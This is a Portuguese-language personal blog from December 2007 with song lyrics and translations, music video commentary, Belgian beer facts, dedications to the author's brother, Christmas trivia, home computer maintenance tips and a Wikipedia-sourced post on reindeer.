A very merry Christmas
And a happy New Year
Let's hope it's a good one
Without any fear
War is over over
If you want it
War is over
Now...


TRADUÇÃO

"Feliz Natal (A Guerra Acabou)"

Então é natal
E o que você tem feito?
Um outro ano se foi
E um novo apenas começa

E então é natal
Espero que tenhas alegria
O proximo e querido
O velho e o Joven

Um alegre Natal
E um feliz ano novo
Vamos esperar que seja um bom ano
Sem sofrimento

E então é natal
Para o fraco e para o forte
Para o rico e para o pobre
O mundo é tão errado

E então feliz natal
Para o negro e para o branco
Para o amarelo e para o vermelho
Vamos parar com todas as lutas

Um alegra Natal
E um feliz ano Novo
Vamos esperar que seja um bom ano
Sem sofrimento

E então é Natal
E o que você fez?
Um outro ano se foi
E um novo apenas começa

E então feliz Natal
Esperamos que tenhas alegria
O proximo e querido
E velho e o Jovem

Um alegre Natal
E um feliz ano novo
Vamos esperar que seja um bom ano
Sem sofrimento
A guerra acabou , se você quiser
A guerra acabou agora



Obs.: Inevitável a canção natalina do grande JOHN LENNON nesta época do ano, que tornou-se um verdadeiro hino. Só pra lembrar, no último dia 8 de dezembro, completaram-se 27 anos desde a morte de JOHN LENNON, que foi brutalmente assassinado em frente ao prédio onde morava, em Nova Iorque.
Deixo aqui, minha sincera homenagem a quem foi sem dúvida, uma lenda, um mito, uma referência a ser seguida por toda a sua luta pelo pacifismo e compromisso social.

Ricardo M. Freire

FRASE DA SEMANA

"Há mais, muito mais, para o Natal do que luz de vela e alegria. É o espírito de doce amizade que brilha todo o ano. É consideração e bondade, é a esperança renascida novamente para a paz, para o entendimento, e para a benevolência dos homens."

(Autor desconhecido)


Obs.: Que interessante... Uma das frases mais significativas de natal que encontrei pra postar no dia de hoje é de origem desconhecida.
Mas enfim, aproveitando o espaço gostaria de desejar a todos um FELIZ NATAL, repleto de muita paz, saúde e harmonia. O resto, é mero "detalhe"...

Ricardo M. Freire

domingo, dezembro 23, 2007

CLIP DO DIA

Encerrando este fim de semana repleto de homenagens para o meu irmão Renato, vamos de THE VERVE no CLIP DO DIA, numa performance ao vivo para a BBC no programa de Jools Holland com o hit "Bitter Sweet Symphony". Banda britânica inspirada musicalmente no estilo que ficou conhecido como "britpop" (Música Popular Britânica), teve sua formação em Wigan (1989), na Inglaterra, tendo como componentes Richard Ashcroft (vocalista/guitarrista), Nick McCabe (guitarrista), Simon Jones (baixista) e Peter Salisbury (baterista). A música "Bitter Sweet Symphony" representou toda a conturbação vivida pela banda. Acusada por MICK JAGGER de plagiar um "sample" e a expressão "Bitter Sweet Symphony" a banda acabou perdendo na justiça todo o direito de criação dela, recebendo então MICK JAGGER os "royalties" referentes ao uso e execução da música.

"Bitter Sweet Symphony" - The Verve

Bélgica, o país da cerveja

Bélgica, o país da cerveja

A Bélgica é um país de forte tradição cervejeira. As cervejas são para os belgas o que os vinhos são para os franceses. Há dois tipos de cervejas: as que matam a sede e as específicas para degustar. Em se tratando das especiais para degustação, estas são servidas na temperatura de 6 a 10 graus, em copos adequados e secos, com muita espuma e nunca com copo cheio. Sempre 1/4 da bebida deve ficar na garrafa.

- A temperatura da bebida é essencial. Quando você bebe uma cerveja muito gelada as papilas gustativas se fecham fazendo com que o sabor desapareça e você não sinta a porcentagem de álcool que está tomando. As cervejas que matam a sede (Lager e trigo) são servidas a 2 graus , em copo comum úmido e com, no máximo, três dedos de espuma.

- Sirva a bebida sempre em copos limpos, sem o menor vestígio de gordura. Se o chope estiver sem espuma, é sinal de que o copo está sujo ou mal enxaguado.

- Ao iniciar uma degustação, comece pelo chope de menor teor alcoólico e com menos sabor. Caso contrário, você poderá comprometer o sabor de um chope mais encorpado e saboroso.

- Cervejas importadas são compradas em lojas ou supermercados especializados, locais em que a bebida é cuidada da maneira correta. As cervejas que são exposta muito tempo ao sol ou à luz artificial, em temperaturas muito altas, estragam muito mais rápido. Essa é uma das razões que faz com que as cervejas belgas sejam engarrafadas em recipientes escuros.

- A temperatura ideal para armazenar o chope é entre 12ºC e 16ºC, mas recomenda-se que o ideal seja mantê-la em temperatura constante.

- Deixe a garrafa por no mínimo dois dias em pé antes de beber. A maioria das cervejas belgas tem segunda e terceira fermentação, o que faz com que fique um sedimento na garrafa. As que têm tampa de champagne podem ser guardadas deitadas, pois a célula de levedura terá maior contato com a bebida, conferindo melhor aroma à cerveja.


A história do Pilsen

O tipo de cerveja que representa o “pils” ou “pilsener” nasceu numa cidade da Boemia chamada Pilsen. Desde a sua instituição em 1295 a cidade recebeu do rei Wenceslas II o direito de produzir com exclusividade a cerveja dentro das paredes da cidade. A cerveja era, até então, produzido com alto taxa de fermentação. Algumas cidades envolvidas na produção de cerveja fundaram em 1842 uma nova cervejaria fora das paredes da cidade e de lá o processo de fermentação já muito popular foi introduzido na região próxima de Beieren. O senhor Jozef Grolle foi contratado como mestre cervejeiro, ele estava familiarizado com a maneira de produzir a cerveja de baixa taxa de fermentação. Grolle,conhecido como um homem muito difícil, acabou produzindo uma loira, ao contrario da cerveja escura que era muito popular. O Pilsnener nasceu. Se o Grolle produziu a cerveja loira com baixa taxa de fermentação conscientemente ou por acaso, ainda é discutido.
Até esse momento as cervejas loiras eram consideradas menos importantes, porque se bebia em grandes potes de pedra ou de estanho e não podia se notar da cor da cerveja.Também na época o vidro ficou ao alcance das massas populares, copo de vidro próprio para as cervejas apareceram nos balcões, assim dando importância a cor e a clareza da cerveja.
A cor clara, loira dourada e o sabor amargo e cheio de malte fizeram um sucesso imediato da cerveja de Pilsen.
Em 1842 foram produzidos 3600HL de pils – o caldeirão só tinha uma capacidade de 37 hl. Via Praga e as spas na região da Boemia como Carlsbad e Marienbad e também via Viena, a nova cerveja conquistou primeiro a Europa, depois o mundo inteiro.
Em 1913 produziram-se, mas de um milhão de hectolitros. O sucesso provocou a imediata imitação das cervejarias de produzir a nova cerveja por todo lado. O “inventor” da cerveja deixou registrar em 1842 o nome Pilsener, reconhecido então com esse nome no mundo inteiro. Tentativas para preservar o nome da cerveja original da Pilsen com exclusividade foram sem sucesso.
Pils ou Pilsener é hoje em dia um nome de certa maneira de produzir uma cerveja, popular no mundo inteiro.
Água, cevada maltada, lúpulo e levedura são as matérias-primas da bebida. Com estes ingredientes são produzidas as cervejas belgas, que são 100% naturais.


Água:
A qualidade da água é muito importante na fabricação de uma boa cerveja, por uma razão particular: 90% da cerveja é constituída de água. A água do poço é tratada, de acordo com o tipo da bebida que será produzida. São usados 7 litros de água para cada litro de cerveja.

Cevada:
Uma grande variedade de grãos pode ser usada na fabricação das cervejas: trigo, centeio, aipim, arroz, milho, entre outros.

Lúpulo:
O lúpulo é uma planta originária da Europa, da qual se retira a substância amarga utilizada na fabricação de cerveja. É o segundo cereal importante na produção da bebida, e responsável por sua conservação. As cervejas belgas são totalmente naturais e não estragam .O cervejeiro mistura vários lúpulos para obter um paladar específico, deliciosamente amargo. Algumas centenas de gramas são suficientes para produzir umas centenas de litros de cerveja.

Levedura:
A levedura é responsável por converter a célula de açúcar em álcool. Neste processo, são liberados aromas que conferem um caráter único à cerveja.

Cada cervejaria usa sua própria levedura, cujas características são guardadas em segredo.


Obs.: Pois é, gente... O negócio é mudar pra Bélgica! (rs)

Ricardo M. Freire

sábado, dezembro 22, 2007

Você sabia?

Você sabia que na Bélgica você pode beber uma marca diferente de cerveja por dia sem que repita a mesma marca durante o período de um ano?

Obs.: Só espero que meu irmão Renato, que está por aqueles lados, não saiba disso! (rs)

Ricardo M. Freire

''Amor De Irmão'' (Barão Vermelho)

"Amor de Irmão" (Barão Vermelho)

Está chegando
Um novo tempo de paz
Junto com a chuva
Indo embora pro mar
E num improviso da jazz
Nossas manias se encontram

Está chegando
Um novo tempo de paz
Tanto faz
Com quem esteja a razão
Vamos ser amigos
Enfrentar os perigos
Não amargar nenhuma tensão

Sem paixão, tanto faz
Amor de irmão ta valendo mais

O que antigamente era vida ou morte
Foi ficando real mais forte
E nossos corações já não sofrem
Do mal da última palavra
E nossas conversas serão
Doces sobremesas calmas

Tá valendo mais
Que qualquer coisa na vida
Mais do que qualquer grilo
O tanto que a gente amou
Que ficou


Obs.: Mais uma belíssima música da época boa do BARÃO VERMELHO nos anos 80, e que também dedico ao meu irmão Renato. Composição de CAZUZA, FREJAT e DÉ.

Ricardo M. Freire

CLIP DO DIA

Totalmente dedicado ao meu irmão Renato, o CLIP DO DIA de hoje fica por conta de sua banda predileta, a banda australiana AC/DC. No clip, a execução do clássico da banda, "JAILBREAK", em imagens raríssimas durante uma performance ao vivo para a TV da época, ainda com o vocalista BON SCOTT, falecido dia 19 de fevereiro de 1980, afogado em seu próprio vômito depois de um porre homérico. A perda marcou profundamente a banda. BRIAN JOHNSON foi convidado pelos irmãos MALCOM e ANGUS YOUNG para substituir BON SCOTT quando assistiram um show em que BRIAN estava se apresentando com sua banda, GEORDIE. BRIAN JOHNSON chegou atrasado na audição onde foi escolhido como novo vocalista. O motivo? Estava jogando sinuca com seus amigos e perdeu a hora. Quando ele explicou o motivo do atraso, MALCOM e ANGUS pensaram: "Ao menos ele gosta de Sinuca!". Quando Brian começou a cantar, o sorriso renasceu nos rostos de ANGUS e MALCOM pela primeira vez desde a morte de BON SCOTT. No mesmo ano, porém, o AC/DC voltou com tudo, lançando BACK IN BLACK, álbum que foi uma homenagem (até no nome) à BON, vendendo mais de 20 milhões de cópias só nos E.U.A. na época de seu lançamento. BACK IN BLACK é hoje o segundo disco mais vendido da história (42 milhões de cópias), só perdendo para THRILLER (54 milhões de cópias), de MICHAEL JACKSON.

"Jaibreak" - AC/DC

IMAGEM ESPETACULAR !!!!!

Entardecer em alguma região da Bélgica

Coragem

Coragem

"A coragem é a primeira das qualidades humanas, porque é a qualidade que garante as demais."

(Winston Churchill)

Obs.: Neste dia totalmente dedicado ao meu querido irmão Renato, deixo no BLOG todas as formas de carinho e apoio.

"Querido irmão, lembre-se sempre que o que faz a grandeza de um homem é o caráter, a coragem e a luta honesta pra se vencer. Jamais se incomode com coisas banais, como status e poder. O teu gesto foi dos mais nobres e de causar inveja. Seja lá qual for o resultado final, a sua maior vitória já foi obtida... Mostrou ser HOMEM de verdade!
Parabéns!"

Ricardo M. Freire

Portas abertas

Portas abertas

"Quando na vida se fecha uma porta para nós, há sempre uma outra que se abre. O mal é que em geral olhamos com tanto pesar e ressentimento para a porta fechada que nós não percebemos a que se abriu."

(J. Paul Schmitt)

Obs.: Mensagem que dedico ao meu querido irmão que partiu em busca de novas conquistas.

Ricardo M. Freire

quinta-feira, dezembro 20, 2007

CLIP DO DIA

Numa quinta-feira chuvosa e cinzenta como esta, só poderíamos ter como CLIP DO DIA todo o colorido do TOM TOM CLUB. Banda de NEW WAVE formada em 1981 pela dupla Tina Weymouth e Chris Frantz como um projeto paralelo, pois ambos eram membros dos Talking Heads. A banda tem influências de vários ritmos musicais, como black music, rock e reggae. O Tom Tom Club experimentou um relativo sucesso comercial especialmente no início do grupo, dentre os quais há um dos seus maiores hits: "Genius of Love".

"Genius Of Love" - TOM TOM CLUB

quarta-feira, dezembro 19, 2007

A origem da árvore de Natal

A origem da árvore de Natal

Existem diversas hipóteses sobre a origem da árvore de Natal.
A “Árvore de Natal”, conhecida em algumas regiões da Europa como a “Árvore de Cristo”, desempenha papel importante na data comemorativa do nascimento de Jesus Cristo. Os relatos mais antigos que se conhecem acerca da Árvore de Natal datam de meados do século XVII, e são provenientes da Alsácia, encantadora província francesa. Descrições de florescimentos de árvores no dia do nascimento de Jesus Cristo levaram os cristãos da antiga Europa a ornamentar suas casas com pinheiros no dia do Natal, única árvore que nas imensidões da neve permanece verde. A “Árvore de Natal” é um símbolo natalino que representa agradecimento pela vinda de Jesus Cristo. O costume de preparar este belo complemento do presépio foi passando de vizinhança em vizinhança, alcançando hoje até países onde a neve é um fenômeno desconhecido.
No Brasil, em se tratando de árvore de Natal, parece existir uma competição entre as cidades brasileiras. Cada uma quer levar vantagem sobre a outra, em se tratando de enfeites natalinos ou quanto ao tamanho da árvore. Umas são maiores e mais requintadas que outras. Algumas contam com mais criatividade, outras são mais econômicas, outras mais altas... Enfim, cada uma tem algo de especial.
A maior árvore de Natal do Brasil é a de Aracajú, com 110 mts de altura, equivalente a um prédio de 30 andares.

Ricardo M. Freire

Deixe seu computador "tinindo"

Deixe seu computador "tinindo"

Muita gente as vezes acaba tomando medidas desnecessárias para deixar seus computadores em ordem. Algumas dicas simples e práticas podem resolver muitos problemas e servindo até como precaução, evitando assim que se gaste dinheiro.

- Use uma boa rede elétrica, de preferência com aterramento, feito por um bom eletricista. Use um estabilizador de voltagem ou mm bom filtro de linha com aterramento que é talvez mais importante do que um estabilizador de voltagem, porque nas nossas linhas de transmissão de energia existem muito mais problemas de ruídos (que são corrigidos pelo filtro de linha) do que de variações (que são corrigidas pelo estabilizador). As fontes dos microcomputadores mais modernos já aceitam variações de tensão na entrada.

- Mantenha a mesa do micro sempre limpa e isenta de poeira. Não fumar e nem fazer lanches na mesa do computador.

- Evite ligar e desligar o micro várias vezes ao dia. Melhor ligá-lo de manhã e desligá-lo no final do expediente.

- Usar SCREEN SAVERS para aumentar a durabilidade do monitor. Os mais eficazes são aqueles que mantém a maior parte da tela escura.

- Anote as configurações do "CMOS SETUP", para que fique mais fácil reprogramá-lo em caso de perda.

- Uma vez por dia use programas detectores de vírus. Use também um escudo anti-vírus residente na memória.

- Usar utilitários como SCANDISK ou Norton Disk Doctor uma vez por semana. Esses programas detectam e corrigem erros na estrutura lógica do winchester.

- Limpeza geral de poeira e contatos, CHECKUP de hardware devem ser feitas por um técnico competente, uma vez por ano.Não fazer ou desfazer conexões com os equipamentos ligados (Ex: conectar o cabo da impressora).

- Se você usa programas de compartilhamento de arquivos, instale um FIREWALL para evitar possíveis invasões.


LIMPEZA EXTERNA

Alguns tipos de sabão possuem agentes muito fortes, como amoníaco e soda cáustica. Para reduzir a chance de que esses agentes ataquem a tinta do gabinete, Nossa equipe desenvolveu uma linha de produtos específicos para a limpeza de seu micro. Limpe o seu monitor, teclado, mouse, CPU, FAX, telefone, celular, sem o risco de danificá-los.


A GARANTIA

Quanto à questão de perda de garantia, ainda não se achou uma solução que seja boa tanto para os usuários como para os fabricantes. Ela pode variar de um revendedor ou fabricante para outro. Alguns exigem que instalações adicionais sejam feitas pelos seus próprios técnicos, caso contrário ocorre uma perda automática de garantia. Outros continuam fornecendo garantia mesmo que o PC seja aberto para expansões, mas anulam a garantia caso constatem que um determinado defeito foi causado por erro do usuário nas suas instalações. Este critério é muito subjetivo, e pode ser usado pelo fabricante como uma desculpa para, por exemplo, deixar de trocar um disco rígido defeituoso (você deve ter estragado o disco rígido quando foi instalar o modem...). A maioria dos fabricantes impõem algum tipo de restrição para que usuários inexperientes não estraguem seus computadores fazendo instalações erradas. Terminado o prazo de garantia, não têm nada a perder fazendo instalações adicionais.


O PROBLEMA DA POEIRA

Mau contato nos conectores e nos soquetes dos chips do microcomputador e dos periféricos, defeitos mecânicos nos drives de disquetes, erros de leitura causados por sujeira nas cabeças dos drives, mau contato no teclado, problemas mecânicos na impressora... A poeira pode ser a causadora de vários defeitos sérios que podem ser evitados com uma manutenção preventiva adequada. Bastam adotar as seguintes medidas:
Sempre que possível procure instalar o seu microcomputador em local protegido.
Uso de capas de proteção.- A capa pode ser adquirida em lojas de suprimentos de informática. Devem ser adquiridas capas para o gabinete, monitor, teclado e impressora. Podem ser de plástico ou tecido.A capa de tecido acumula mais poeira. Enquanto o PC não estiver ligado as capas devem ser colocadas. Isso reduz drasticamente a quantidade de poeira no interior do equipamento. A poeira não precisa de convite para entrar. Qualquer fresta ou orifício é suficiente para que seja estabelecido um fluxo de poeira que se acumula no interior do equipamento. A capa é a melhor forma de cortar este fluxo. A capa ideal é aquela que cobre o computador por todos os lados, INCLUSIVE ATRAS. Ao contrário do que muitos pensam, não é necessário esperar alguns minutos com o computador desligado antes de colocar as capas. Podem ser colocadas imediatamente, logo após desligá-lo. As capas devem ser limpas semanalmente, por dentro e por fora. O mesmo deve ser feito com a parte externa do gabinete, teclado, impressora, monitor e com a mesa onde o computador está instalado.


LIMPEZAS SEMESTRAIS OU ANUAIS

Mesmo com o uso da capa, uma certa quantidade de poeira ainda entra no computador, e precisa ser regularmente limpa a cada 6 meses, ou mesmo a cada 12 meses. Para isto é preciso desmontar e montar novamente o computador, então chame o seu técnico de confiança.


PROTEGENDO O COMPUTADOR DA UMIDADE

Além de poeira, a umidade é uma grande causadora de maus contatos. Um computador pode apresentar defeitos após um ou dois anos de uso caso não sejam tomadas às devidas providências. A mistura de poeira com umidade é ainda mais nociva para o computador. Substâncias existentes na poeira, como o enxofre, produzem acidez ao entrarem em contato com a umidade. A poeira ácida pode provocar defeitos no computador em uma questão de alguns meses. Já vimos o que fazer para proteger o computador contra a poeira. Agora veremos o que fazer em relação à umidade. Trata-se de um problema muito sério em regiões litorâneas ou florestais. Para combate-la usa-se capas, sílica gel e limpezas anuais com spray limpador de contatos. A capa plástica, além de proteger o computador da poeira, protege também da umidade. Além disso, é necessária para que a ação da sílica seja eficaz. A sílica é uma substância sólida, com o aspecto similar a areia branca. Também pode ser encontrada na forma de pequenas pedras azuis, do tamanho de grãos de arroz. Possui a propriedade química de atrair para si toda a umidade ao seu redor. A sílica pode ser adquirida em casas de material químico.Os saquinhos devem ser colocados no interior do gabinete, do monitor, da impressora e do teclado, Devem ser presos com uma fita adesiva bem firme em um local qualquer, desde que seja longe da fonte e longe dos circuitos e do disco rígido, pois o calor faz a umidade ser expulsa da sílica.


CUIDADOS EXTRAS NO VERÃO

Será que o calor faz mal para o micro? Será que o micro precisa de ar condicionado? Sim, o calor excessivo faz mal ao micro, e pode inclusive danificá-lo de forma permanente. Se temos a chance de colocar o micro em um local com ar condicionado, é bom fazê-lo, desde que isto não cause transtorno. Se colocar o micro em um local com ar condicionado for problemático ou impossível, temos que tomar cuidados especiais. Quando o micro está localizado em um local quente, a sua temperatura interna é normalmente 20o mais quente do que a temperatura ambiente, portanto é bom se certificar da eficiência do sistema de ventilação do gabinete.
Existem coisas que podem ser feitas para melhorar esta ventilação:

- Evite deixar a parte traseira do micro muito próxima à parede. Recomenda-se uma distancia mínima de 15 centímetros para facilitar a saída do ar quente que sai pela parte traseira do computador.

- Também devemos deixar livre a parte frontal do computador, evitando a obstrução da sua entrada de ar.

- Peça ao seu técnico de confiança que abra o gabinete do seu microcomputador e arrume os cabos flat de tal forma que não atrapalhem o fluxo de ar.

- Muitos micros possuem fendas na sua parte traseira, em posições correspondentes aos slots que não estão em uso. Essas fendas não ajudam a ventilação. É melhor tampá-las, de modo que o ar frio entrará pela parte frontal do gabinete, circulará pelo seu interior e sairá pela sua parte traseira, graças ao ventilador existente na fonte de alimentação.

Com esses pequenos cuidados, a eficiência da ventilação interna é melhorada, e pode-se assim fazer com que a diferença da temperatura interna para a externa diminua bastante.


AR CONDICIONADO

Quando o micro está em local com ar condicionado muito forte, seus componentes podem ficar a uma temperatura muito baixa (é claro, isto ocorre apenas quando o micro está desligado). Se desligarmos o ar condicionado e abrirmos as janelas, a umidade se condensará nas placas do computador, podendo causar oxidação dos metais, e conseqüentemente mau contato. A melhor regra para evitar este problema é sempre cobrir o computador com a capa assim que for desligado.
Muitas pessoas têm o hábito de ligar o ar condicionado e esperar alguns minutos até a temperatura abaixar para só então ligar o computador. Isto está errado, pois quanto maior for a variação de temperatura, maior será o estresse térmico, grande causador de danos em componentes eletrônicos. O procedimento correto é ligar o micro logo após ligar o ar condicionado, sem esperar o ambiente esfriar.


CHUVAS E TEMPESTADES

- Não deixe o micro próximo a uma janela. Além de captar muito mais poeira, tomará sol, e é bom lembrar que você corre o risco de esquecer a janela aberta e aí vem uma daquelas chuvas de verão e...
Tome muito cuidado com raios. Desligue a tomada telefônica (no caso de computadores com modem) e desligue também da tomada da rede elétrica. Aliás, se você tem em casa outros aparelhos elétricos é conveniente desconectá-los de suas tomadas durante tempestades. Se você viajar, deixe tudo desconectado por medida de segurança.

- Mesmo depois que a chuva termina, existe o problema da interrupção no fornecimento de energia elétrica. Espere pelo menos meia hora, para ter certeza de que a energia realmente está normalizada antes de retomar o seu trabalho no microcomputador. Procedendo desta forma, você não corre o risco de perder arquivos durante uma outra interrupção de energia. Espere algum tempo.

Ricardo m. Freire

CLIP DO DIA

Hoje vamos de THE WHO, banda que é considerada uma das melhores ao vivo de todos os tempos.
O The Who é uma banda de rock britânica surgida nos anos 60. Sua evolução musical culminou numa fase de grande sucesso na década de 70. Após um período inativo entre os anos 80 e 90, o The Who retornou aos palcos e, apesar da perda de dois de seus integrantes originais, o baixista John Entwistle e o espetacular baterista Keith Moon, continua a se apresentar esporadicamente. Conhecidos pelo dinamismo de suas apresentações e por sua música reflexiva e repleta de influências artísticas, eles também são julgados pioneiros do rock, popularizando entre outras coisas a ópera rock (principalmente com o álbum TOMMY) sob a liderança de Pete Townshend. No princípio de sua carreira a banda ficou conhecida por arrebentar completamente seus instrumentos no final dos shows (especialmente Townshend, cuja destruição de guitarras tornar-se-ia um clichê do rock, e o alucinado Keith Moon, mandando seu kit de bateria pelos ares).
Moon é considerado por muitos músicos como um dos melhores e certamente o mais revolucionário baterista de rock and roll de todos os tempos. A maioria dos bateristas contemporâneos de Keith, como Neil Peart, Mitch Mitchell, John Bonham e Ginger Baker, o apontam como uma influência primordial.
O tributo mais famoso a Moon é o personagem "Animal" do MUPPETS, um baterista maluco que, de tão alucinado, precisa ser acorrentado a seu instrumento durante as apresentações.
Keith Moon era um furacão em forma de baterista. Apresentava um estilo exuberante e extravagante, extremamente agressivo para a época. Suas baquetas voavam o tempo todo com aproveitamento integral de todo o palco, inserindo viradas impressionantes dentro de uma mesma música inúmeras vezes. Foi também um dos primeiros bateras de rock a utilizar dois bumbos, abolindo o chimbal. O mais incrível é que essa barulheira se encaixava perfeitamente na sonoridade do The Who. Coisa de gênio, intuitiva e inexplicável.

"Baba O´Riley" - THE WHO

Saiba quem são as renas

Saiba quem são as renas

A rena (palavra de origem lapônia ou finlandesa, pelo francês renne) ou caribu (na América do Norte) é um cervídeo de grande porte, com chifres, que vive em manadas e habita latitudes altas. São característicos das regiões árticas do norte do Canadá, Alasca, Rússia, Escandinávia e Islândia. A origem da palavra "caribu" pode ser uma palavra em micmac, que significa "pata". O caribu é único entre os veados, pois machos e fêmeas possuem chifres.
Em 1952 a espécie foi reintroduzida com sucesso na Escócia, onde se extinguira no século X. Há oito subespécies de rena reconhecidas, que correspondem às populações de diferentes áreas.
A rena apresenta dimorfismo sexual, sendo os machos de até 300 kg bastante maiores que as fêmeas. Ambos os sexos têm galhadas, que são mais elaboradas nos machos. As principais fontes de alimentação das renas são bambus, folhas de sempre-vivas, ervas rasteiras e principalmente líquenes. Este animais podem, no entanto, comer também pequenos pássaros e ovos. A rena tem dentes frontais apenas no maxilar inferior.
Sazonalmente, migra grandes distâncias para parir as crias. Também pode nadar. Possui pernas compridas, com cascos afiados e patas peludas que garantem a tração sobre terrenos congelados. Geralmente, a rena é silenciosa, mas seus tendões produzem ruídos secos e agudos que podem ser ouvidos a grandes distâncias quando viaja em grandes grupos.
A rena é atacada por ursos, lobos, seres humanos e, surpreendentemente, por águias-douradas (ou águias-reais); os corvos por vezes causam cegueira em renas recém-nascidas, perfurando-lhes e comendo os seus olhos, causando a sua morte prematura. Vários tipos de mosquitos e moscas, como a mosca preta parasítica Hypoderma bovis, podem molestá-la o suficiente para afetar sua saúde e causar doenças.
A rena é bastante importante na economia das populações nativas do Ártico como os povos inuit e os habitantes da Lapónia. Estes povos domesticaram a rena como fonte de alimento e de peles e animal de tracção. Para além das manadas domésticas, as renas são também caçadas nalguns locais pelos mesmos motivos.

(Fonte: Wikipédia)